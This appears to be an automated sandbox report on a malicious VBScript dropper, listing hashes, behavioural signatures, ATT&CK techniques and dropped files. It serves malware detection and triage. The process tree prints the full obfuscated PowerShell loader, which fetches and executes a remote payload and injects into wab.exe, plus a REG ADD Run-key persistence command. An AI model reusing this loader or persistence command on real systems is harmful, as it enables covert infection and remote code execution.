b8e48c5ea0ed4ffaeda18f0ac9044a5da59db2a703bb86f859b377240575a2ef

General

Target

1afa97a4a2c1d6bae74b4b76298b85de076a084bcee539b9503a3d4bd1d13016.vbs
Size

27KB
MD5

7dfd8643db03575d693bc1b869db804d
SHA1

f4ac1dba10c97ea3d73ca06655bb59d12b6dda90
SHA256

1afa97a4a2c1d6bae74b4b76298b85de076a084bcee539b9503a3d4bd1d13016
SHA512

723acd7a90ae8ef21b581c950781067f48200e244531ce276f0c48c955d88a25b618b8ec07de0e3e8e719e7556186c63fd46cb5a22d430cc090d46d98a722f01
SSDEEP

384:4TFS6TUL9BSzLsMUNQZK235QSKpZZnvggiQi1PLltwGRKCst:4Tg6T09B48NQZV35gyQipLlzRKR

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	1764	WScript.exe
6	1764	WScript.exe
8	1528	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\Understemmers = "%Selvforstaaelsers% -w 1 $Brobyvrk=(Get-ItemProperty -Path 'HKCU:\\Uddannelsesfondens24\\').Lagenlrred;%Selvforstaaelsers% ($Brobyvrk)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2964	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1528	powershell.exe
2964	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1528 set thread context of 2964	1528	powershell.exe	32

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
328	reg.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2564	powershell.exe
1528	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1528	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2564	powershell.exe
Token: SeDebugPrivilege	1528	powershell.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 1764 wrote to memory of 2564	1764	WScript.exe	30
PID 1764 wrote to memory of 2564	1764	WScript.exe	30
PID 1764 wrote to memory of 2564	1764	WScript.exe	30
PID 2564 wrote to memory of 1528	2564	powershell.exe	31
PID 2564 wrote to memory of 1528	2564	powershell.exe	31
PID 2564 wrote to memory of 1528	2564	powershell.exe	31
PID 2564 wrote to memory of 1528	2564	powershell.exe	31
PID 1528 wrote to memory of 2964	1528	powershell.exe	32
PID 1528 wrote to memory of 2964	1528	powershell.exe	32
PID 1528 wrote to memory of 2964	1528	powershell.exe	32
PID 1528 wrote to memory of 2964	1528	powershell.exe	32
PID 1528 wrote to memory of 2964	1528	powershell.exe	32
PID 1528 wrote to memory of 2964	1528	powershell.exe	32
PID 2964 wrote to memory of 1452	2964	wab.exe	35
PID 2964 wrote to memory of 1452	2964	wab.exe	35
PID 2964 wrote to memory of 1452	2964	wab.exe	35
PID 2964 wrote to memory of 1452	2964	wab.exe	35
PID 1452 wrote to memory of 328	1452	cmd.exe	33
PID 1452 wrote to memory of 328	1452	cmd.exe	33
PID 1452 wrote to memory of 328	1452	cmd.exe	33
PID 1452 wrote to memory of 328	1452	cmd.exe	33

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1afa97a4a2c1d6bae74b4b76298b85de076a084bcee539b9503a3d4bd1d13016.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1764
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "gal;gal;gal;gal;gal;gal;gal;gal;gal;Function Quacksalver9 ($Trediveren135){$Recurrer = $Trediveren135.Length-1; For ($Autistiske=4; $Autistiske -lt $Recurrer){$Dispensere=$Dispensere+$Trediveren135.Substring( $Autistiske, 1);$Autistiske+=5;}$Dispensere;}$Vectis=Quacksalver9 'UnpohSupetPulstSolbpquinsComp:Kuns/ Skn/sergbDatarHullo ProdHexabRegieKrigcProvkSnekcRbesoTikanMellsstyluAprilPhastQuadiPassnchitgRuff.CouncNutloMethmPira/ NavwVoldpMole-Palmc SeloPartnNonctGenreHensnSkygtIrre/FodbFEskoi ZarlPersmFusicCasteFyldnConssUdslu VerrSemieFlamrtuppnUndeeUndisBagg. AnspUnstn BlogZard ';$Dispensere01=Quacksalver9 'LedeiUnwee BulxUncl ';$Matchings = Quacksalver9 'Teks\OutlsStudy GifsFluewSynso SpowSoix6Line4Popu\ TenWSnariNephnParadTilsoGresw BoesStjePUpbooProgwRivae Ensr AntSOrdlhSummeDecal Tral Rnn\FuldvKalk1Fors.Gide0unde\IntepjubioKapiwsygeeSkkerOestsSendhBorte TinlSexllArbe. Bale UndxFixeeBiza ';&($Dispensere01) (Quacksalver9 'Dial$ AirFOnloi ScalSammuKalar Byr2Rend=Fofa$KulteHushnParavTeks: Prvw Meti Kirn TandGloxiTongrStra ') ;&($Dispensere01) (Quacksalver9 'Nonc$MiliMImpraUrprtAmzecBallhVelfiEnwrnViolgBismsChar=Unte$RavkFAdjuiKontlUnwruGaddrPube2 cam+ Rav$EngaM ChaaReatt MatcUnwhh GloiGrovnSkovgBjrnsSkat ') ;&($Dispensere01) (Quacksalver9 'Scoo$GennDGiftdFores GemasausaMisorhfteeTempnAnkleMuklsCale Pref=Over Antr(Dalt(GrosgRkebwSkolmHypeiOpti Doraw SkuiAnninlyst3Outh2Pode_Udmup TrorSkrioGushc Hyle RetsBaggsafle Vand-FeraF The HjnsPUnnerNavnoIntucMarmeinklsReals BruIHavndAmpu=Orga$Omre{anodPSlutIOverDPahl}Test)Gast.KvilC ToooCasumSkatm WelaUfulnSolidFrekLLysoiRaamnNytteOpmu) Art Mant-naphsPyropcytilBraniUnextKebs Rene[TrancSammhOntoatighrklan]Brem3arbe4obli ');&($Dispensere01) (Quacksalver9 'Sper$ RecF StaoinsirPseus IshtUnasu PoidGradiLunce Chlt Fuz Over=Wolf Lenv$ReciDOmendNetvsUnfraKnuba WinrPlacemaisnPrcieCacosGuar[Etag$RiddDWangdBailsHensa HamaskosrBilleRgelnFelteTabusDona.Boerc SnooOdesuTegsn TartSerr- Sta2Papm]Cact ');&($Dispensere01) (Quacksalver9 ' Mar$IndsDSyrojFotueThorlOverl TraaudsobBalzaIlbuhMass=Eiri(SkriTWildeGenbsMudmtWito-SilePAblaaKdektIndahBeth Lech$careMIodhaUrokt HoacFrethUndeiRedun egogUnsysfuld)Slav Dun-UndeABlomnSydddConc Optr( cai[ArraIOvernSavftDiscPUncotUnmar Dam]Ende: Ska: UsmsDenti KolzSpene Ove Rad-Prore ForqCoed Stan8Pros) ekl ') ;if ($Djellabah) {&$Matchings $Forstudiet;} else {;$Dispensere00=Quacksalver9 ' ErhSFototHjsdaTeler TektSkrd- DitBDagbiFilttAracs UpaTBivurFyrkaPostnlancsFamif BeseAfgarfork Suf-jozeSUnicoFahruRullrWilmcWelseLede Andr$BromVMatee barcIndetZephiAktisKult Vgti-ShibDnacre DemsUncltSomeiStrun SchaAcictHipliPaneoHardnUdva Domk$VgteFFamiigopalDjveu Invrunde2Idle ';&($Dispensere01) (Quacksalver9 'grun$BrusF Heai Subl KnkuOrthrSigm2Soci=Redd$Arboe GumnWirevHalv:Media Funpindgp AurdStruaManntBestaJord ') ;&($Dispensere01) (Quacksalver9 ' SymIOvermInvep SnooBrevr Nomtblge- GroMFridoMotidBureuCholl Unte Lof SelBUnsqiMagitRosasilocTRindrabunaTolenAfgisDriffrdsteMucarIndf ') ;$Filur2=$Filur2+'\Aculea176.Ary';while (-not $Breakability) {&($Dispensere01) (Quacksalver9 ' Sko$EvelB ResrdisteInstaPeiskMillaDrukbZeugiTanal TeliBotatDosiyEspa= Eks(AksiTInveeFastsFinttgala-BlodPMulaaBrnet LanhWire Snor$ProlFHektiBronlKolduvintrZulu2Demi) car ') ;&($Dispensere01) $Dispensere00;&($Dispensere01) (Quacksalver9 ' NonSRegntBeniaMetyr Bant Pri-UnanSFavolDynaeMarieReddpDish Vrdi5 Iar ');}&($Dispensere01) (Quacksalver9 'Unre$DataQEvenuOvera ForcGlotkBlubs Fusa IndlApetvKammeNonorEksp Kamm=Miss NeglGTreaehovetepil-UensC VaroSammnTilstKhade Vomn udstBldn Stor$toksFPseuiBragl RouuUpsor Men2Daup ');&($Dispensere01) (Quacksalver9 ' Ant$ferrASalpdIrremNoniiFhvrr Groa Unnl thisVelatSlusabrndb saleAndasDisg Rari= Gru back[vennSHoldySemisStantEpipeIndrmFarv.OptiCBarsoAfsknFinvvSulke AldrFraftElaf]Mete:Meld:DibuF ColrQuisoMobimSikkBRedoaAdensKonfeSvig6Mode4 AktSForstComir HeaitrannNervgMega(Sala$NonpQRippuCarba SkucTegnkCatasPrenaTornlArkfvNonneSektrPter)tian ');&($Dispensere01) (Quacksalver9 'Inve$overD DumiSiegsIndvpSkrde SygnDampsAssoe RekrklaneTrin2Over Tole=Fdse Punc[HypoSCharyForusdemotOopheTampmrkeb.EvviTKaveeWestx TertLiba.VejlE Parn Wigcprivo AmmdSpiliBaannGeotgDisp]Komp: Rep:DebuAValoSAnalCLainIHypeIhagu.harbGAvene SubtquesSRavit EndrSkylihjbenkontgSuns(Unde$FartAScandDryfm BysiHalsrAnsiaRegelSorts veltRancaIngobfataemilisplan) Obs ');&($Dispensere01) (Quacksalver9 'Bryn$idioU Udln Burb DomeIrriaHvisv PineTrolrLandeDrrudMaka=Refo$BrtsDDesiiCarnsTrappSelee ConndecosNovieVandrUnsteUncr2Usgs.PedasTraiuNedsbFunksForltPatrrParaiIrvin CatgBoos(Fees3Cros0Tele1Fors3Buss2Rhiz8Fedd,Indb2Stra5Cyto7Unfr4Lixe4Grup)Hand ');&($Dispensere01) $Unbeavered;}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2564
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "gal;gal;gal;gal;gal;gal;gal;gal;gal;Function Quacksalver9 ($Trediveren135){$Recurrer = $Trediveren135.Length-1; For ($Autistiske=4; $Autistiske -lt $Recurrer){$Dispensere=$Dispensere+$Trediveren135.Substring( $Autistiske, 1);$Autistiske+=5;}$Dispensere;}$Vectis=Quacksalver9 'UnpohSupetPulstSolbpquinsComp:Kuns/ Skn/sergbDatarHullo ProdHexabRegieKrigcProvkSnekcRbesoTikanMellsstyluAprilPhastQuadiPassnchitgRuff.CouncNutloMethmPira/ NavwVoldpMole-Palmc SeloPartnNonctGenreHensnSkygtIrre/FodbFEskoi ZarlPersmFusicCasteFyldnConssUdslu VerrSemieFlamrtuppnUndeeUndisBagg. AnspUnstn BlogZard ';$Dispensere01=Quacksalver9 'LedeiUnwee BulxUncl ';$Matchings = Quacksalver9 'Teks\OutlsStudy GifsFluewSynso SpowSoix6Line4Popu\ TenWSnariNephnParadTilsoGresw BoesStjePUpbooProgwRivae Ensr AntSOrdlhSummeDecal Tral Rnn\FuldvKalk1Fors.Gide0unde\IntepjubioKapiwsygeeSkkerOestsSendhBorte TinlSexllArbe. Bale UndxFixeeBiza ';&($Dispensere01) (Quacksalver9 'Dial$ AirFOnloi ScalSammuKalar Byr2Rend=Fofa$KulteHushnParavTeks: Prvw Meti Kirn TandGloxiTongrStra ') ;&($Dispensere01) (Quacksalver9 'Nonc$MiliMImpraUrprtAmzecBallhVelfiEnwrnViolgBismsChar=Unte$RavkFAdjuiKontlUnwruGaddrPube2 cam+ Rav$EngaM ChaaReatt MatcUnwhh GloiGrovnSkovgBjrnsSkat ') ;&($Dispensere01) (Quacksalver9 'Scoo$GennDGiftdFores GemasausaMisorhfteeTempnAnkleMuklsCale Pref=Over Antr(Dalt(GrosgRkebwSkolmHypeiOpti Doraw SkuiAnninlyst3Outh2Pode_Udmup TrorSkrioGushc Hyle RetsBaggsafle Vand-FeraF The HjnsPUnnerNavnoIntucMarmeinklsReals BruIHavndAmpu=Orga$Omre{anodPSlutIOverDPahl}Test)Gast.KvilC ToooCasumSkatm WelaUfulnSolidFrekLLysoiRaamnNytteOpmu) Art Mant-naphsPyropcytilBraniUnextKebs Rene[TrancSammhOntoatighrklan]Brem3arbe4obli ');&($Dispensere01) (Quacksalver9 'Sper$ RecF StaoinsirPseus IshtUnasu PoidGradiLunce Chlt Fuz Over=Wolf Lenv$ReciDOmendNetvsUnfraKnuba WinrPlacemaisnPrcieCacosGuar[Etag$RiddDWangdBailsHensa HamaskosrBilleRgelnFelteTabusDona.Boerc SnooOdesuTegsn TartSerr- Sta2Papm]Cact ');&($Dispensere01) (Quacksalver9 ' Mar$IndsDSyrojFotueThorlOverl TraaudsobBalzaIlbuhMass=Eiri(SkriTWildeGenbsMudmtWito-SilePAblaaKdektIndahBeth Lech$careMIodhaUrokt HoacFrethUndeiRedun egogUnsysfuld)Slav Dun-UndeABlomnSydddConc Optr( cai[ArraIOvernSavftDiscPUncotUnmar Dam]Ende: Ska: UsmsDenti KolzSpene Ove Rad-Prore ForqCoed Stan8Pros) ekl ') ;if ($Djellabah) {&$Matchings $Forstudiet;} else {;$Dispensere00=Quacksalver9 ' ErhSFototHjsdaTeler TektSkrd- DitBDagbiFilttAracs UpaTBivurFyrkaPostnlancsFamif BeseAfgarfork Suf-jozeSUnicoFahruRullrWilmcWelseLede Andr$BromVMatee barcIndetZephiAktisKult Vgti-ShibDnacre DemsUncltSomeiStrun SchaAcictHipliPaneoHardnUdva Domk$VgteFFamiigopalDjveu Invrunde2Idle ';&($Dispensere01) (Quacksalver9 'grun$BrusF Heai Subl KnkuOrthrSigm2Soci=Redd$Arboe GumnWirevHalv:Media Funpindgp AurdStruaManntBestaJord ') ;&($Dispensere01) (Quacksalver9 ' SymIOvermInvep SnooBrevr Nomtblge- GroMFridoMotidBureuCholl Unte Lof SelBUnsqiMagitRosasilocTRindrabunaTolenAfgisDriffrdsteMucarIndf ') ;$Filur2=$Filur2+'\Aculea176.Ary';while (-not $Breakability) {&($Dispensere01) (Quacksalver9 ' Sko$EvelB ResrdisteInstaPeiskMillaDrukbZeugiTanal TeliBotatDosiyEspa= Eks(AksiTInveeFastsFinttgala-BlodPMulaaBrnet LanhWire Snor$ProlFHektiBronlKolduvintrZulu2Demi) car ') ;&($Dispensere01) $Dispensere00;&($Dispensere01) (Quacksalver9 ' NonSRegntBeniaMetyr Bant Pri-UnanSFavolDynaeMarieReddpDish Vrdi5 Iar ');}&($Dispensere01) (Quacksalver9 'Unre$DataQEvenuOvera ForcGlotkBlubs Fusa IndlApetvKammeNonorEksp Kamm=Miss NeglGTreaehovetepil-UensC VaroSammnTilstKhade Vomn udstBldn Stor$toksFPseuiBragl RouuUpsor Men2Daup ');&($Dispensere01) (Quacksalver9 ' Ant$ferrASalpdIrremNoniiFhvrr Groa Unnl thisVelatSlusabrndb saleAndasDisg Rari= Gru back[vennSHoldySemisStantEpipeIndrmFarv.OptiCBarsoAfsknFinvvSulke AldrFraftElaf]Mete:Meld:DibuF ColrQuisoMobimSikkBRedoaAdensKonfeSvig6Mode4 AktSForstComir HeaitrannNervgMega(Sala$NonpQRippuCarba SkucTegnkCatasPrenaTornlArkfvNonneSektrPter)tian ');&($Dispensere01) (Quacksalver9 'Inve$overD DumiSiegsIndvpSkrde SygnDampsAssoe RekrklaneTrin2Over Tole=Fdse Punc[HypoSCharyForusdemotOopheTampmrkeb.EvviTKaveeWestx TertLiba.VejlE Parn Wigcprivo AmmdSpiliBaannGeotgDisp]Komp: Rep:DebuAValoSAnalCLainIHypeIhagu.harbGAvene SubtquesSRavit EndrSkylihjbenkontgSuns(Unde$FartAScandDryfm BysiHalsrAnsiaRegelSorts veltRancaIngobfataemilisplan) Obs ');&($Dispensere01) (Quacksalver9 'Bryn$idioU Udln Burb DomeIrriaHvisv PineTrolrLandeDrrudMaka=Refo$BrtsDDesiiCarnsTrappSelee ConndecosNovieVandrUnsteUncr2Usgs.PedasTraiuNedsbFunksForltPatrrParaiIrvin CatgBoos(Fees3Cros0Tele1Fors3Buss2Rhiz8Fedd,Indb2Stra5Cyto7Unfr4Lixe4Grup)Hand ');&($Dispensere01) $Unbeavered;}"
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1528
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of WriteProcessMemory
      PID:2964
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Understemmers" /t REG_EXPAND_SZ /d "%Selvforstaaelsers% -w 1 $Brobyvrk=(Get-ItemProperty -Path 'HKCU:\Uddannelsesfondens24\').Lagenlrred;%Selvforstaaelsers% ($Brobyvrk)"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1452

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Understemmers" /t REG_EXPAND_SZ /d "%Selvforstaaelsers% -w 1 $Brobyvrk=(Get-ItemProperty -Path 'HKCU:\Uddannelsesfondens24\').Lagenlrred;%Selvforstaaelsers% ($Brobyvrk)"
1⤵
- Adds Run key to start application
- Modifies registry key
PID:328

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
7ea66fe59c158a6530452e0e6d455473

SHA1
020dfbe5a20a9c299c8ca2fd5ab1339ddf7a4dc5

SHA256
2a96f8ae7ab2e354a5d0dddaad5a261b41fc282b29dea879dd857fa3840d603a

SHA512
af52b3b378a965a136e6e1c7c71151ba232d5b70ab0a0b58f5db225c475b39777ec94072cb894f75c619af5de073785c3624276685669f6ba8d4d342df2f61a9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
ebeb38b3a5fb0ccfc8730874d877f7a5

SHA1
a1e6c7179e0cb885be2be20f96d33eb109f4167e

SHA256
bb68d13e293f85c55f4c071e3ad5fae16d59e44ef4743abc5daad8da89b229d9

SHA512
f3a191b63bc4a193b6c5e23721847fd6c519fc8e4a7c1a032984828376ba7855d1fdc0c4bcd08854db729e74c34915d4bb14e8fbdd924c7b02b8e8d274c3641a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
242B

MD5
9760e694edfc84dddd0f0c8e4e8089e3

SHA1
cde9a499d9c5c41c598e04669f6b6688592a1e88

SHA256
610a397c36d209b8baa071087e84fda80c85effbb3b427591a2885f20ff2467e

SHA512
77aeedf59e7d53c7815795bc0293d688b3e3f0887c27e0338ea9a079cae1a1255288d0077d423eab43645b84da85e6d5a304c669e81dc612e83e11560c54a69a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar11F0.tmp

Filesize
97KB

MD5
50989cd1d4fdf5da6dddb190c943abcd

SHA1
2f8d3a781f8a7321cd53e07653876d6bb5974f31

SHA256
98a5621a652f138a9bd5241d9e8c958ff042ff78694e8d7982d9641f6022d0f4

SHA512
383fe526042c359b664f5ec3f9124ee9c46bae2ca4d1d6320d8a0d19d3f802ce13cf9457ad02f52fa8997d3f27da22908e0c08e2bbf3ce0be4f53f8003232501

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TQZV0NVTWE62EOQ54VW7.temp

Filesize
7KB

MD5
03e01cdf10badde7b69a3c69721e4a55

SHA1
0b4fbc047c3c112b24d325b84fb1f4eb9f68db42

SHA256
1ba7a3b5cca0050ece965409e75e71929205d104dea104e81451e731df9b90d2

SHA512
3bd0cb313ddacf051f0b554adcc0bc381312ba779f04cb396169fd3393f4a4f87f24d69154ac766d6bee6b809430c0a6135fea6cfcfc31cc88f5e45a85381779

Download Submit
memory/1528-103-0x0000000077270000-0x0000000077419000-memory.dmp

Filesize
1.7MB

Download
memory/1528-98-0x00000000056F0000-0x00000000056F1000-memory.dmp

Filesize
4KB

Download
memory/1528-104-0x0000000077460000-0x0000000077536000-memory.dmp

Filesize
856KB

Download
memory/1528-102-0x00000000029C0000-0x0000000002A00000-memory.dmp

Filesize
256KB

Download
memory/1528-101-0x0000000073110000-0x00000000736BB000-memory.dmp

Filesize
5.7MB

Download
memory/1528-99-0x0000000006B60000-0x000000000A6ED000-memory.dmp

Filesize
59.6MB

Download
memory/1528-74-0x0000000073110000-0x00000000736BB000-memory.dmp

Filesize
5.7MB

Download
memory/1528-78-0x00000000029C0000-0x0000000002A00000-memory.dmp

Filesize
256KB

Download
memory/1528-77-0x00000000029C0000-0x0000000002A00000-memory.dmp

Filesize
256KB

Download
memory/1528-76-0x00000000029C0000-0x0000000002A00000-memory.dmp

Filesize
256KB

Download
memory/1528-75-0x0000000073110000-0x00000000736BB000-memory.dmp

Filesize
5.7MB

Download
memory/2564-69-0x0000000002AE0000-0x0000000002B60000-memory.dmp

Filesize
512KB

Download
memory/2564-96-0x0000000002AE0000-0x0000000002B60000-memory.dmp

Filesize
512KB

Download
memory/2564-65-0x0000000001E60000-0x0000000001E68000-memory.dmp

Filesize
32KB

Download
memory/2564-70-0x0000000002AE0000-0x0000000002B60000-memory.dmp

Filesize
512KB

Download
memory/2564-71-0x0000000002AE0000-0x0000000002B60000-memory.dmp

Filesize
512KB

Download
memory/2564-67-0x0000000002AE0000-0x0000000002B60000-memory.dmp

Filesize
512KB

Download
memory/2564-100-0x0000000002AE0000-0x0000000002B60000-memory.dmp

Filesize
512KB

Download
memory/2564-68-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

Filesize
9.6MB

Download
memory/2564-66-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

Filesize
9.6MB

Download
memory/2564-95-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

Filesize
9.6MB

Download
memory/2564-97-0x0000000002AE0000-0x0000000002B60000-memory.dmp

Filesize
512KB

Download
memory/2564-148-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

Filesize
9.6MB

Download
memory/2564-64-0x000000001B720000-0x000000001BA02000-memory.dmp

Filesize
2.9MB

Download
memory/2964-108-0x0000000077496000-0x0000000077497000-memory.dmp

Filesize
4KB

Download
memory/2964-109-0x0000000077460000-0x0000000077536000-memory.dmp

Filesize
856KB

Download
memory/2964-106-0x0000000077270000-0x0000000077419000-memory.dmp

Filesize
1.7MB

Download
memory/2964-147-0x0000000077270000-0x0000000077419000-memory.dmp

Filesize
1.7MB

Download
memory/2964-146-0x0000000077460000-0x0000000077536000-memory.dmp

Filesize
856KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads